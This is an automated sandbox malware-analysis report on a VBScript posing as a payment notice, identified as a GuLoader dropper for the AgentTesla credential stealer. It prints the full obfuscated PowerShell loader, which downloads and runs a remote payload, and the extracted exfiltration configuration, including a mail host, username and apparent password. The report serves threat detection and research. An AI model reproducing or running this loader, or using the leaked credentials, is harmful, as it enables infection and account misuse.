Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OUTSTANDING PAYMENT STATUS 01199241024.vbs

Overview

General Information

Sample name:OUTSTANDING PAYMENT STATUS 01199241024.vbs
Analysis ID:1540844
MD5:7fa14a09427be7ceba827276d7fd75dc
SHA1:db51a4f0c0fd11413e428ef3af6669d28d4c924d
SHA256:e1be3817c6710586dfbbab1ccd925975da7d0d1d41cf6cdd5fe6e8e29063b40c
Tags:Formbookvbsuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5996 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget 'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal. Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten (Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE .yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten (Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten $Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget ' Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill= Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl ') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget 'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal ');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten (Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4508 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget 'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal. Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten (Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE .yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten (Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten $Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget ' Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill= Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl ') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget 'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal ');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten (Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3116 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.ihcm.com.my", "Username": "kienyee@ihcm.com.my", "Password": "Kienyee53625362"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2495915604.0000000008430000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2479023084.00000000056A4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 8 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6800.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_6800.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x102ca:$b2: ::FromBase64String(
              • 0xd62c:$s1: -join
              • 0x6dd8:$s4: +=
              • 0x6e9a:$s4: +=
              • 0xb0c1:$s4: +=
              • 0xd1de:$s4: +=
              • 0xd4c8:$s4: +=
              • 0xd60e:$s4: +=
              • 0xf9d8:$s4: +=
              • 0xfa58:$s4: +=
              • 0xfb1e:$s4: +=
              • 0xfb9e:$s4: +=
              • 0xfd74:$s4: +=
              • 0xfdf8:$s4: +=
              • 0xde5f:$e4: Get-WmiObject
              • 0xe04e:$e4: Get-Process
              • 0xe0a6:$e4: Start-Process
              amsi32_4508.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xae4d:$b2: ::FromBase64String(
              • 0x9ec4:$s1: -join
              • 0x3670:$s4: +=
              • 0x3732:$s4: +=
              • 0x7959:$s4: +=
              • 0x9a76:$s4: +=
              • 0x9d60:$s4: +=
              • 0x9ea6:$s4: +=
              • 0x14516:$s4: +=
              • 0x14596:$s4: +=
              • 0x1465c:$s4: +=
              • 0x146dc:$s4: +=
              • 0x148b2:$s4: +=
              • 0x14936:$s4: +=
              • 0xa6f7:$e4: Get-WmiObject
              • 0xa8e6:$e4: Get-Process
              • 0xa93e:$e4: Start-Process
              • 0x15196:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", CommandLine|base64offset|contains: <, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", ProcessId: 5996, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3116, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49875
              Sigma detected: Suspicious Outbound SMTP Connections
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.165, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3116, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49935
              Sigma detected: Suspicious Scan Loop Network
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large 